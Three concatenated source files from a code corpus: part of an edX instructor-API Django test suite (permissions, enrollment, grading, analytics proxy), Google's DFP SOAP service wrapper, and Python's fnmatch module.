'list_instructor_tasks',
'list_forum_members',
'update_forum_role_membership',
'proxy_legacy_analytics',
]
for endpoint in staff_level_endpoints:
url = reverse(endpoint, kwargs={'course_id': self.course.id})
response = self.client.get(url, {})
self.assertEqual(response.status_code, 403)
def test_instructor_level(self):
"""
Ensure that a staff member can't access instructor endpoints.
"""
instructor_level_endpoints = [
'modify_access',
'list_course_role_members',
'reset_student_attempts',
'list_instructor_tasks',
'update_forum_role_membership',
]
for endpoint in instructor_level_endpoints:
url = reverse(endpoint, kwargs={'course_id': self.course.id})
response = self.client.get(url, {})
self.assertEqual(response.status_code, 403)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class TestInstructorAPIEnrollment(ModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test enrollment modification endpoint.
This test does NOT exhaustively test state changes, that is the
job of test_enrollment. This tests the response and action switch.
"""
def setUp(self):
self.instructor = AdminFactory.create()
self.course = CourseFactory.create()
self.client.login(username=self.instructor.username, password='test')
self.enrolled_student = UserFactory()
CourseEnrollment.enroll(
self.enrolled_student,
self.course.id
)
self.notenrolled_student = UserFactory()
self.notregistered_email = 'robot-not-an-email-yet@robot.org'
self.assertEqual(User.objects.filter(email=self.notregistered_email).count(), 0)
# uncomment to enable printing of large diffs
# from failed assertions in the event of a test failure.
# (comment because pylint C0103)
# self.maxDiff = None
def test_missing_params(self):
""" Test missing all query parameters. """
url = reverse('students_update_enrollment', kwargs={'course_id': self.course.id})
response = self.client.get(url)
self.assertEqual(response.status_code, 400)
def test_bad_action(self):
""" Test with an invalid action. """
action = 'robot-not-an-action'
url = reverse('students_update_enrollment', kwargs={'course_id': self.course.id})
response = self.client.get(url, {'emails': self.enrolled_student.email, 'action': action})
self.assertEqual(response.status_code, 400)
def test_enroll(self):
url = reverse('students_update_enrollment', kwargs={'course_id': self.course.id})
response = self.client.get(url, {'emails': self.notenrolled_student.email, 'action': 'enroll'})
print "type(self.notenrolled_student.email): {}".format(type(self.notenrolled_student.email))
self.assertEqual(response.status_code, 200)
# test that the user is now enrolled
self.assertEqual(
self.notenrolled_student.courseenrollment_set.filter(
course_id=self.course.id
).count(),
1
)
# test the response data
expected = {
"action": "enroll",
"auto_enroll": False,
"results": [
{
"email": self.notenrolled_student.email,
"before": {
"enrollment": False,
"auto_enroll": False,
"user": True,
"allowed": False,
},
"after": {
"enrollment": True,
"auto_enroll": False,
"user": True,
"allowed": False,
}
}
]
}
res_json = json.loads(response.content)
self.assertEqual(res_json, expected)
def test_unenroll(self):
url = reverse('students_update_enrollment', kwargs={'course_id': self.course.id})
response = self.client.get(url, {'emails': self.enrolled_student.email, 'action': 'unenroll'})
print "type(self.enrolled_student.email): {}".format(type(self.enrolled_student.email))
self.assertEqual(response.status_code, 200)
# test that the user is now unenrolled
self.assertEqual(
self.enrolled_student.courseenrollment_set.filter(
course_id=self.course.id,
is_active=1,
).count(),
0
)
# test the response data
expected = {
"action": "unenroll",
"auto_enroll": False,
"results": [
{
"email": self.enrolled_student.email,
"before": {
"enrollment": True,
"auto_enroll": False,
"user": True,
"allowed": False,
},
"after": {
"enrollment": False,
"auto_enroll": False,
"user": True,
"allowed": False,
}
}
]
}
res_json = json.loads(response.content)
self.assertEqual(res_json, expected)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class TestInstructorAPILevelsAccess(ModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test endpoints whereby instructors can change permissions
of other users.
This test does NOT test whether the actions had an effect on the
database; that is the job of test_access.
This tests the response and action switch.
Actually, modify_access does not have a very meaningful
response yet, so only the status code is tested.
"""
def setUp(self):
self.instructor = AdminFactory.create()
self.course = CourseFactory.create()
self.client.login(username=self.instructor.username, password='test')
self.other_instructor = UserFactory()
allow_access(self.course, self.other_instructor, 'instructor')
self.other_staff = UserFactory()
allow_access(self.course, self.other_staff, 'staff')
self.other_user = UserFactory()
def test_modify_access_noparams(self):
""" Test missing all query parameters. """
url = reverse('modify_access', kwargs={'course_id': self.course.id})
response = self.client.get(url)
self.assertEqual(response.status_code, 400)
def test_modify_access_bad_action(self):
""" Test with an invalid action parameter. """
url = reverse('modify_access', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'email': self.other_staff.email,
'rolename': 'staff',
'action': 'robot-not-an-action',
})
self.assertEqual(response.status_code, 400)
def test_modify_access_bad_role(self):
""" Test with an invalid action parameter. """
url = reverse('modify_access', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'email': self.other_staff.email,
'rolename': 'robot-not-a-roll',
'action': 'revoke',
})
self.assertEqual(response.status_code, 400)
def test_modify_access_allow(self):
url = reverse('modify_access', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'email': self.other_instructor.email,
'rolename': 'staff',
'action': 'allow',
})
self.assertEqual(response.status_code, 200)
def test_modify_access_revoke(self):
url = reverse('modify_access', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'email': self.other_staff.email,
'rolename': 'staff',
'action': 'revoke',
})
self.assertEqual(response.status_code, 200)
def test_modify_access_revoke_not_allowed(self):
""" Test revoking access that a user does not have. """
url = reverse('modify_access', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'email': self.other_staff.email,
'rolename': 'instructor',
'action': 'revoke',
})
self.assertEqual(response.status_code, 200)
def test_modify_access_revoke_self(self):
"""
Test that an instructor cannot remove instructor privileges from themselves.
"""
url = reverse('modify_access', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'email': self.instructor.email,
'rolename': 'instructor',
'action': 'revoke',
})
self.assertEqual(response.status_code, 400)
def test_list_course_role_members_noparams(self):
""" Test missing all query parameters. """
url = reverse('list_course_role_members', kwargs={'course_id': self.course.id})
response = self.client.get(url)
self.assertEqual(response.status_code, 400)
def test_list_course_role_members_bad_rolename(self):
""" Test with an invalid rolename parameter. """
url = reverse('list_course_role_members', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'rolename': 'robot-not-a-rolename',
})
print response
self.assertEqual(response.status_code, 400)
def test_list_course_role_members_staff(self):
url = reverse('list_course_role_members', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'rolename': 'staff',
})
print response
self.assertEqual(response.status_code, 200)
# check response content
expected = {
'course_id': self.course.id,
'staff': [
{
'username': self.other_staff.username,
'email': self.other_staff.email,
'first_name': self.other_staff.first_name,
'last_name': self.other_staff.last_name,
}
]
}
res_json = json.loads(response.content)
self.assertEqual(res_json, expected)
def test_list_course_role_members_beta(self):
url = reverse('list_course_role_members', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'rolename': 'beta',
})
print response
self.assertEqual(response.status_code, 200)
# check response content
expected = {
'course_id': self.course.id,
'beta': []
}
res_json = json.loads(response.content)
self.assertEqual(res_json, expected)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class TestInstructorAPILevelsDataDump(ModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test endpoints that show data without side effects.
"""
def setUp(self):
self.instructor = AdminFactory.create()
self.course = CourseFactory.create()
self.client.login(username=self.instructor.username, password='test')
self.students = [UserFactory() for _ in xrange(6)]
for student in self.students:
CourseEnrollment.enroll(student, self.course.id)
def test_get_students_features(self):
"""
Test that a minimum set of information is formatted
correctly in the response to get_students_features.
"""
url = reverse('get_students_features', kwargs={'course_id': self.course.id})
response = self.client.get(url, {})
res_json = json.loads(response.content)
self.assertIn('students', res_json)
for student in self.students:
student_json = [
x for x in res_json['students']
if x['username'] == student.username
][0]
self.assertEqual(student_json['username'], student.username)
self.assertEqual(student_json['email'], student.email)
def test_get_students_features_csv(self):
"""
Test that the CSV response to get_students_features
has the expected content type.
"""
url = reverse('get_students_features', kwargs={'course_id': self.course.id})
response = self.client.get(url + '/csv', {})
self.assertEqual(response['Content-Type'], 'text/csv')
def test_get_distribution_no_feature(self):
"""
Test that get_distribution lists available features
when supplied no feature query parameter.
"""
url = reverse('get_distribution', kwargs={'course_id': self.course.id})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
res_json = json.loads(response.content)
self.assertEqual(type(res_json['available_features']), list)
url = reverse('get_distribution', kwargs={'course_id': self.course.id})
response = self.client.get(url + u'?feature=')
self.assertEqual(response.status_code, 200)
res_json = json.loads(response.content)
self.assertEqual(type(res_json['available_features']), list)
def test_get_distribution_unavailable_feature(self):
"""
Test that get_distribution fails gracefully with
an unavailable feature.
"""
url = reverse('get_distribution', kwargs={'course_id': self.course.id})
response = self.client.get(url, {'feature': 'robot-not-a-real-feature'})
self.assertEqual(response.status_code, 400)
def test_get_distribution_gender(self):
"""
Test that get_distribution returns the gender distribution
for enrolled students.
"""
url = reverse('get_distribution', kwargs={'course_id': self.course.id})
response = self.client.get(url, {'feature': 'gender'})
self.assertEqual(response.status_code, 200)
res_json = json.loads(response.content)
print res_json
self.assertEqual(res_json['feature_results']['data']['m'], 6)
self.assertEqual(res_json['feature_results']['choices_display_names']['m'], 'Male')
self.assertEqual(res_json['feature_results']['data']['no_data'], 0)
self.assertEqual(res_json['feature_results']['choices_display_names']['no_data'], 'No Data')
def test_get_student_progress_url(self):
""" Test that progress_url is in the successful response. """
url = reverse('get_student_progress_url', kwargs={'course_id': self.course.id})
url += "?student_email={}".format(
quote(self.students[0].email.encode("utf-8"))
)
print url
response = self.client.get(url)
print response
self.assertEqual(response.status_code, 200)
res_json = json.loads(response.content)
self.assertIn('progress_url', res_json)
def test_get_student_progress_url_noparams(self):
""" Test that the endpoint 404's without the required query params. """
url = reverse('get_student_progress_url', kwargs={'course_id': self.course.id})
response = self.client.get(url)
self.assertEqual(response.status_code, 400)
def test_get_student_progress_url_nostudent(self):
""" Test that the endpoint 400's when requesting an unknown email. """
url = reverse('get_student_progress_url', kwargs={'course_id': self.course.id})
# request a progress URL for an email that matches no user
response = self.client.get(url, {'student_email': 'robot-not-a-student@robot.org'})
self.assertEqual(response.status_code, 400)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class TestInstructorAPIRegradeTask(ModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test endpoints whereby instructors can change student grades.
This includes resetting attempts and starting rescore tasks.
This test does NOT test whether the actions had an effect on the
database; that is the job of task tests and test_enrollment.
"""
def setUp(self):
self.instructor = AdminFactory.create()
self.course = CourseFactory.create()
self.client.login(username=self.instructor.username, password='test')
self.student = UserFactory()
CourseEnrollment.enroll(self.student, self.course.id)
self.problem_urlname = 'robot-some-problem-urlname'
self.module_to_reset = StudentModule.objects.create(
student=self.student,
course_id=self.course.id,
module_state_key=_msk_from_problem_urlname(
self.course.id,
self.problem_urlname
),
state=json.dumps({'attempts': 10}),
)
def test_reset_student_attempts_delete_all(self):
""" Make sure no one can delete all students' state on a problem. """
url = reverse('reset_student_attempts', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'problem_to_reset': self.problem_urlname,
'all_students': True,
'delete_module': True,
})
print response.content
self.assertEqual(response.status_code, 400)
def test_reset_student_attempts_single(self):
""" Test reset single student attempts. """
url = reverse('reset_student_attempts', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'problem_to_reset': self.problem_urlname,
'student_email': self.student.email,
})
print response.content
self.assertEqual(response.status_code, 200)
# make sure problem attempts have been reset.
changed_module = StudentModule.objects.get(pk=self.module_to_reset.pk)
self.assertEqual(
json.loads(changed_module.state)['attempts'],
0
)
# mock out the function which should be called to execute the action.
@patch.object(instructor_task.api, 'submit_reset_problem_attempts_for_all_students')
def test_reset_student_attempts_all(self, act):
""" Test reset all student attempts. """
url = reverse('reset_student_attempts', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'problem_to_reset': self.problem_urlname,
'all_students': True,
})
print response.content
self.assertEqual(response.status_code, 200)
self.assertTrue(act.called)
def test_reset_student_attempts_missingmodule(self):
""" Test reset for non-existant problem. """
url = reverse('reset_student_attempts', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'problem_to_reset': 'robot-not-a-real-module',
'student_email': self.student.email,
})
print response.content
self.assertEqual(response.status_code, 400)
def test_reset_student_attempts_delete(self):
""" Test delete single student state. """
url = reverse('reset_student_attempts', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'problem_to_reset': self.problem_urlname,
'student_email': self.student.email,
'delete_module': True,
})
print response.content
self.assertEqual(response.status_code, 200)
# make sure the module has been deleted
self.assertEqual(
StudentModule.objects.filter(
student=self.module_to_reset.student,
course_id=self.module_to_reset.course_id,
# module_state_key=self.module_to_reset.module_state_key,
).count(),
0
)
def test_reset_student_attempts_nonsense(self):
""" Test failure with both student_email and all_students. """
url = reverse('reset_student_attempts', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'problem_to_reset': self.problem_urlname,
'student_email': self.student.email,
'all_students': True,
})
print response.content
self.assertEqual(response.status_code, 400)
@patch.object(instructor_task.api, 'submit_rescore_problem_for_student')
def test_rescore_problem_single(self, act):
""" Test rescoring of a single student. """
url = reverse('rescore_problem', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'problem_to_reset': self.problem_urlname,
'student_email': self.student.email,
})
print response.content
self.assertEqual(response.status_code, 200)
self.assertTrue(act.called)
@patch.object(instructor_task.api, 'submit_rescore_problem_for_all_students')
def test_rescore_problem_all(self, act):
""" Test rescoring for all students. """
url = reverse('rescore_problem', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'problem_to_reset': self.problem_urlname,
'all_students': True,
})
print response.content
self.assertEqual(response.status_code, 200)
self.assertTrue(act.called)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class TestInstructorAPITaskLists(ModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test instructor task list endpoint.
"""
class FakeTask(object):
""" Fake task object """
FEATURES = ['task_type', 'task_input', 'task_id', 'requester', 'created', 'task_state']
def __init__(self):
for feature in self.FEATURES:
setattr(self, feature, 'expected')
def to_dict(self):
""" Convert fake task to dictionary representation. """
return {key: 'expected' for key in self.FEATURES}
def setUp(self):
self.instructor = AdminFactory.create()
self.course = CourseFactory.create()
self.client.login(username=self.instructor.username, password='test')
self.student = UserFactory()
CourseEnrollment.enroll(self.student, self.course.id)
self.problem_urlname = 'robot-some-problem-urlname'
self.module = StudentModule.objects.create(
student=self.student,
course_id=self.course.id,
module_state_key=_msk_from_problem_urlname(
self.course.id,
self.problem_urlname
),
state=json.dumps({'attempts': 10}),
)
self.tasks = [self.FakeTask() for _ in xrange(6)]
@patch.object(instructor_task.api, 'get_running_instructor_tasks')
def test_list_instructor_tasks_running(self, act):
""" Test list of all running tasks. """
act.return_value = self.tasks
url = reverse('list_instructor_tasks', kwargs={'course_id': self.course.id})
response = self.client.get(url, {})
print response.content
self.assertEqual(response.status_code, 200)
# check response
self.assertTrue(act.called)
expected_tasks = [ftask.to_dict() for ftask in self.tasks]
expected_res = {'tasks': expected_tasks}
self.assertEqual(json.loads(response.content), expected_res)
@patch.object(instructor_task.api, 'get_instructor_task_history')
def test_list_instructor_tasks_problem(self, act):
""" Test list task history for problem. """
act.return_value = self.tasks
url = reverse('list_instructor_tasks', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'problem_urlname': self.problem_urlname,
})
print response.content
self.assertEqual(response.status_code, 200)
# check response
self.assertTrue(act.called)
expected_tasks = [ftask.to_dict() for ftask in self.tasks]
expected_res = {'tasks': expected_tasks}
self.assertEqual(json.loads(response.content), expected_res)
@patch.object(instructor_task.api, 'get_instructor_task_history')
def test_list_instructor_tasks_problem_student(self, act):
""" Test list task history for problem AND student. """
act.return_value = self.tasks
url = reverse('list_instructor_tasks', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'problem_urlname': self.problem_urlname,
'student_email': self.student.email,
})
print response.content
self.assertEqual(response.status_code, 200)
# check response
self.assertTrue(act.called)
expected_tasks = [ftask.to_dict() for ftask in self.tasks]
expected_res = {'tasks': expected_tasks}
self.assertEqual(json.loads(response.content), expected_res)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
@override_settings(ANALYTICS_SERVER_URL="http://robotanalyticsserver.netbot:900/")
@override_settings(ANALYTICS_API_KEY="robot_api_key")
class TestInstructorAPIAnalyticsProxy(ModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test instructor analytics proxy endpoint.
"""
class FakeProxyResponse(object):
""" Fake successful requests response object. """
def __init__(self):
self.status_code = instructor.views.api.codes.OK
self.content = '{"test_content": "robot test content"}'
class FakeBadProxyResponse(object):
""" Fake strange-failed requests response object. """
def __init__(self):
self.status_code = 'notok.'
self.content = '{"test_content": "robot test content"}'
def setUp(self):
self.instructor = AdminFactory.create()
self.course = CourseFactory.create()
self.client.login(username=self.instructor.username, password='test')
@patch.object(instructor.views.api.requests, 'get')
def test_analytics_proxy_url(self, act):
""" Test legacy analytics proxy url generation. """
act.return_value = self.FakeProxyResponse()
url = reverse('proxy_legacy_analytics', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'aname': 'ProblemGradeDistribution'
})
print response.content
self.assertEqual(response.status_code, 200)
# check request url
expected_url = "{url}get?aname={aname}&course_id={course_id}&apikey={api_key}".format(
url="http://robotanalyticsserver.netbot:900/",
aname="ProblemGradeDistribution",
course_id=self.course.id,
api_key="robot_api_key",
)
act.assert_called_once_with(expected_url)
@patch.object(instructor.views.api.requests, 'get')
def test_analytics_proxy(self, act):
"""
Test legacy analytics content proxying.
"""
act.return_value = self.FakeProxyResponse()
url = reverse('proxy_legacy_analytics', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'aname': 'ProblemGradeDistribution'
})
print response.content
self.assertEqual(response.status_code, 200)
# check response
self.assertTrue(act.called)
expected_res = {'test_content': "robot test content"}
self.assertEqual(json.loads(response.content), expected_res)
@patch.object(instructor.views.api.requests, 'get')
def test_analytics_proxy_reqfailed(self, act):
""" Test proxy when server reponds with failure. """
act.return_value = self.FakeBadProxyResponse()
url = reverse('proxy_legacy_analytics', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'aname': 'ProblemGradeDistribution'
})
print response.content
self.assertEqual(response.status_code, 500)
@patch.object(instructor.views.api.requests, 'get')
def test_analytics_proxy_missing_param(self, act):
""" Test proxy when missing the aname query parameter. """
act.return_value = self.FakeProxyResponse()
url = reverse('proxy_legacy_analytics', kwargs={'course_id': self.course.id})
response = self.client.get(url, {})
print response.content
self.assertEqual(response.status_code, 400)
self.assertFalse(act.called)
class TestInstructorAPIHelpers(TestCase):
""" Test helpers for instructor.api """
def test_split_input_list(self):
strings = []
lists = []
strings.append("Lorem@ipsum.dolor, sit@amet.consectetur\nadipiscing@elit.Aenean\r convallis@at.lacus\r, ut@lacinia.Sed")
lists.append(['Lorem@ipsum.dolor', 'sit@amet.consectetur', 'adipiscing@elit.Aenean', 'convallis@at.lacus', 'ut@lacinia.Sed'])
for (stng, lst) in zip(strings, lists):
self.assertEqual(_split_input_list(stng), lst)
def test_split_input_list_unicode(self):
self.assertEqual(_split_input_list('robot@robot.edu, robot2@robot.edu'), ['robot@robot.edu', 'robot2@robot.edu'])
self.assertEqual(_split_input_list(u'robot@robot.edu, robot2@robot.edu'), ['robot@robot.edu', 'robot2@robot.edu'])
self.assertEqual(_split_input_list(u'robot@robot.edu, robot2@robot.edu'), [u'robot@robot.edu', 'robot2@robot.edu'])
scary_unistuff = unichr(40960) + u'abcd' + unichr(1972)
self.assertEqual(_split_input_list(scary_unistuff), [scary_unistuff])
def test_msk_from_problem_urlname(self):
args = ('MITx/6.002x/2013_Spring', 'L2Node1')
output = 'i4x://MITx/6.002x/problem/L2Node1'
self.assertEqual(_msk_from_problem_urlname(*args), output)
@raises(ValueError)
def test_msk_from_problem_urlname_error(self):
args = ('notagoodcourse', 'L2Node1')
_msk_from_problem_urlname(*args)
| agpl-3.0 |
lociii/googleads-python-lib | adspygoogle/dfp/GenericDfpService.py | 2 | 9822 | #!/usr/bin/python
#
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generic proxy to access any DFP web service."""
__author__ = 'api.jdilallo@gmail.com (Joseph DiLallo)'
import time
from adspygoogle import SOAPpy
from adspygoogle.common import Utils
from adspygoogle.common.Errors import Error
from adspygoogle.common.Errors import ValidationError
from adspygoogle.common.GenericApiService import GenericApiService
from adspygoogle.common.GenericApiService import MethodInfoKeys
from adspygoogle.dfp import AUTH_TOKEN_EXPIRE
from adspygoogle.dfp import AUTH_TOKEN_SERVICE
from adspygoogle.dfp import LIB_SIG
from adspygoogle.dfp import LIB_URL
from adspygoogle.dfp.DfpErrors import DfpApiError
from adspygoogle.dfp.DfpErrors import DfpError
from adspygoogle.dfp.DfpErrors import ERRORS
from adspygoogle.dfp.DfpSoapBuffer import DfpSoapBuffer
class GenericDfpService(GenericApiService):
"""Wrapper for any DFP web service."""
# The _IGNORED_HEADER_VALUES are keys in the headers dictionary passed into
# this class' constructor which should NOT be packed into the SOAP header.
_IGNORED_HEADER_VALUES = ('authToken', 'email', 'password',
'oauth2credentials')
# The _WRAP_LISTS constant indicates that DFP services do not need to wrap
# lists in an extra layer of XML element tags.
_WRAP_LISTS = False
# The _BUFFER_CLASS is the subclass of SoapBuffer that should be used to track
# all SOAP interactions
_BUFFER_CLASS = DfpSoapBuffer
def __init__(self, headers, config, op_config, lock, logger, service_name):
"""Inits GenericDfpService.
Args:
headers: dict Dictionary object with populated authentication
credentials.
config: dict Dictionary object with populated configuration values.
op_config: dict Dictionary object with additional configuration values for
this operation.
lock: thread.lock Thread lock to use to synchronize requests.
logger: Logger Instance of Logger to use for logging.
service_name: string The name of this service.
"""
service_url = '/'.join([op_config['server'], 'apis/ads/publisher',
op_config['version'], service_name])
namespace = '/'.join(['https://www.google.com/apis/ads/publisher',
op_config['version']])
namespace_extractor = _DetermineNamespacePrefix
super(GenericDfpService, self).__init__(
headers, config, op_config, lock, logger, service_name, service_url,
GenericDfpService._WRAP_LISTS, GenericDfpService._BUFFER_CLASS,
namespace, namespace_extractor)
# DFP-specific changes to the SOAPpy.WSDL.Proxy
methodattrs = {
'xmlns:dfp': self._namespace,
'xmlns': self._namespace
}
self._soappyservice.soapproxy.methodattrs = methodattrs
def _SetHeaders(self):
"""Sets the SOAP headers for this service's requests."""
now = time.time()
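# Regenerate the ClientLogin auth token only when it is absent or has
# outlived AUTH_TOKEN_EXPIRE, and only when OAuth2 credentials are not
# being used instead.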
if ((('authToken' not in self._headers and
'auth_token_epoch' not in self._config) or
int(now - self._config['auth_token_epoch']) >= AUTH_TOKEN_EXPIRE) and
not self._headers.get('oauth2credentials')):
if ('email' not in self._headers or not self._headers['email'] or
'password' not in self._headers or not self._headers['password']):
raise ValidationError('Required authentication headers, \'email\' and '
'\'password\', are missing. Unable to regenerate '
'authentication token.')
self._headers['authToken'] = Utils.GetAuthToken(
self._headers['email'], self._headers['password'], AUTH_TOKEN_SERVICE,
LIB_SIG, self._config['proxy'])
self._config['auth_token_epoch'] = time.time()
# Apply headers to the SOAPpy service.
soap_headers = SOAPpy.Types.headerType(attrs={'xmlns': self._namespace})
request_header_data = {}
if 'authToken' in self._headers:
authentication_block = SOAPpy.Types.structType(
data={'token': self._headers['authToken']},
name='authentication', typed=0,
attrs={(SOAPpy.NS.XSI3, 'type'): 'ClientLogin'})
request_header_data['authentication'] = authentication_block
for key in self._headers:
if (key in GenericDfpService._IGNORED_HEADER_VALUES or
not self._headers[key]):
continue
value = self._headers[key]
if key == 'applicationName':
value = ''.join([value, LIB_SIG])
request_header_data[key] = SOAPpy.Types.stringType(value)
request_header = SOAPpy.Types.structType(
data=request_header_data, name='RequestHeader', typed=0)
soap_headers.RequestHeader = request_header
if 'authToken' in self._headers:
soap_headers.RequestHeader._keyord = ['applicationName', 'authentication']
self._soappyservice.soapproxy.header = soap_headers
def _GetMethodInfo(self, method_name):
"""Pulls all of the relevant data about a method from a SOAPpy service.
The return dictionary has two keys, MethodInfoKeys.INPUTS and
MethodInfoKeys.OUTPUTS. Each of these keys has a list value. These lists
contain a dictionary of information on the input/output parameter list, in
order.
Args:
method_name: string The name of the method to pull information for.
Returns:
dict A dictionary containing information about a SOAP method.
"""
rval = {}
rval[MethodInfoKeys.INPUTS] = []
for i in range(len(self._soappyservice.wsdl.types[
self._namespace].elements[method_name].content.content.content)):
param_attributes = self._soappyservice.wsdl.types[
self._namespace].elements[method_name].content.content.content[
i].attributes
inparam = {
MethodInfoKeys.ELEMENT_NAME: param_attributes['name'],
MethodInfoKeys.NS: param_attributes['type'].getTargetNamespace(),
MethodInfoKeys.TYPE: param_attributes['type'].getName(),
MethodInfoKeys.MAX_OCCURS: param_attributes['maxOccurs']
}
rval[MethodInfoKeys.INPUTS].append(inparam)
rval[MethodInfoKeys.OUTPUTS] = []
for i in range(len(self._soappyservice.wsdl.types[
self._namespace].elements[
method_name + 'Response'].content.content.content)):
param_attributes = self._soappyservice.wsdl.types[
self._namespace].elements[
method_name + 'Response'].content.content.content[i].attributes
outparam = {
MethodInfoKeys.ELEMENT_NAME: param_attributes['name'],
MethodInfoKeys.NS: param_attributes['type'].getTargetNamespace(),
MethodInfoKeys.TYPE: param_attributes['type'].getName(),
MethodInfoKeys.MAX_OCCURS: param_attributes['maxOccurs']
}
rval[MethodInfoKeys.OUTPUTS].append(outparam)
return rval
def _HandleLogsAndErrors(self, buf, start_time, stop_time, error=None):
"""Manage SOAP XML message.
Args:
buf: SoapBuffer SOAP buffer.
start_time: str Time before service call was invoked.
stop_time: str Time after service call was invoked.
[optional]
error: dict Error, if any.
"""
if error is None:
error = {}
try:
handlers = self.__GetLogHandlers(buf)
fault = super(GenericDfpService, self)._ManageSoap(
buf, handlers, LIB_URL, start_time, stop_time, error)
if fault:
# Raise a specific error, subclass of DfpApiError.
if 'detail' in fault:
if 'code' in fault['detail']:
code = int(fault['detail']['code'])
if code in ERRORS: raise ERRORS[code](fault)
elif 'errors' in fault['detail']:
error_type = fault['detail']['errors'][0]['type']
if error_type in ERRORS: raise ERRORS[str(error_type)](fault)
if isinstance(fault, basestring):
raise DfpError(fault)
elif isinstance(fault, dict):
raise DfpApiError(fault)
except DfpApiError, e:
raise e
except DfpError, e:
raise e
except Error, e:
if error: e = error
raise Error(e)
def __GetLogHandlers(self, buf):
"""Gets a list of log handlers for the DFP library.
Args:
buf: SoapBuffer SOAP buffer from which calls are retrieved for logging.
Returns:
list Log handlers for the DFP library.
"""
return [
{
'tag': 'xml_log',
'name': 'soap_xml',
'data': ''
},
{
'tag': 'request_log',
'name': 'request_info',
'data': str('host=%s service=%s method=%s responseTime=%s '
'requestId=%s'
% (Utils.GetNetLocFromUrl(self._service_url),
self._service_name, buf.GetCallName(),
buf.GetCallResponseTime(), buf.GetCallRequestId()))
},
{
'tag': '',
'name': 'dfp_api_lib',
'data': ''
}
]
def _DetermineNamespacePrefix(url):
"""Returns the SOAP prefix to use for definitions within the given namespace.
Args:
url: string The URL of the namespace.
Returns:
string The SOAP namespace prefix to use for the given namespace.
"""
return 'dfp:'
| apache-2.0 |
tcheehow/MissionPlanner | Lib/fnmatch.py | 84 | 3355 | """Filename matching with shell patterns.
fnmatch(FILENAME, PATTERN) matches according to the local convention.
fnmatchcase(FILENAME, PATTERN) always takes case in account.
The functions operate by translating the pattern into a regular
expression. They cache the compiled regular expressions for speed.
The function translate(PATTERN) returns a regular expression
corresponding to PATTERN. (It does not compile it.)
"""
import re
__all__ = ["filter", "fnmatch", "fnmatchcase", "translate"]
_cache = {}
_MAXCACHE = 100
def _purge():
"""Clear the pattern cache"""
_cache.clear()
def fnmatch(name, pat):
"""Test whether FILENAME matches PATTERN.
Patterns are Unix shell style:
* matches everything
? matches any single character
[seq] matches any character in seq
[!seq] matches any char not in seq
An initial period in FILENAME is not special.
Both FILENAME and PATTERN are first case-normalized
if the operating system requires it.
If you don't want this, use fnmatchcase(FILENAME, PATTERN).
"""
import os
name = os.path.normcase(name)
pat = os.path.normcase(pat)
return fnmatchcase(name, pat)
def filter(names, pat):
"""Return the subset of the list NAMES that match PAT"""
import os,posixpath
result=[]
pat=os.path.normcase(pat)
if not pat in _cache:
res = translate(pat)
if len(_cache) >= _MAXCACHE:
_cache.clear()
_cache[pat] = re.compile(res)
match=_cache[pat].match
if os.path is posixpath:
# normcase on posix is NOP. Optimize it away from the loop.
for name in names:
if match(name):
result.append(name)
else:
for name in names:
if match(os.path.normcase(name)):
result.append(name)
return result
def fnmatchcase(name, pat):
"""Test whether FILENAME matches PATTERN, including case.
This is a version of fnmatch() which doesn't case-normalize
its arguments.
"""
if not pat in _cache:
res = translate(pat)
if len(_cache) >= _MAXCACHE:
_cache.clear()
_cache[pat] = re.compile(res)
return _cache[pat].match(name) is not None
def translate(pat):
"""Translate a shell PATTERN to a regular expression.
There is no way to quote meta-characters.
"""
i, n = 0, len(pat)
res = ''
while i < n:
c = pat[i]
i = i+1
if c == '*':
res = res + '.*'
elif c == '?':
res = res + '.'
elif c == '[':
j = i
if j < n and pat[j] == '!':
j = j+1
if j < n and pat[j] == ']':
j = j+1
while j < n and pat[j] != ']':
j = j+1
if j >= n:
res = res + '\\['
else:
stuff = pat[i:j].replace('\\','\\\\')
i = j+1
if stuff[0] == '!':
stuff = '^' + stuff[1:]
elif stuff[0] == '^':
stuff = '\\' + stuff
res = '%s[%s]' % (res, stuff)
else:
res = res + re.escape(c)
return res + '\Z(?ms)'
| gpl-3.0 |
